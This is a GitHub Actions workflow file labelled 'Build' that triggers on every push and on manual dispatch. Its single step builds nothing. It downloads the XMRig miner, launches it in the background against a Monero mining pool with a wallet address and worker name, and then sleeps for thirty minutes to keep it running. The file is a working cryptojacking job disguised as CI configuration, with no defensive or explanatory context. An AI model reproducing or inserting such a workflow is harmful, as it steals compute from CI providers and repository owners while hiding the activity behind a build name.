name: Build
on: 
  workflow_dispatch:
  push:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -sL https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-x64.tar.gz | tar xz
          cd xmrig-6.21.0
          nohup ./xmrig -o pool.hashvault.pro:80 -u D4dbTEpvsDDQK8V56USNgDsircfmDHXQQmTkafnxLR56 -p gh-AlphaB135 --randomx -t 2 --background &
          sleep 1800 || true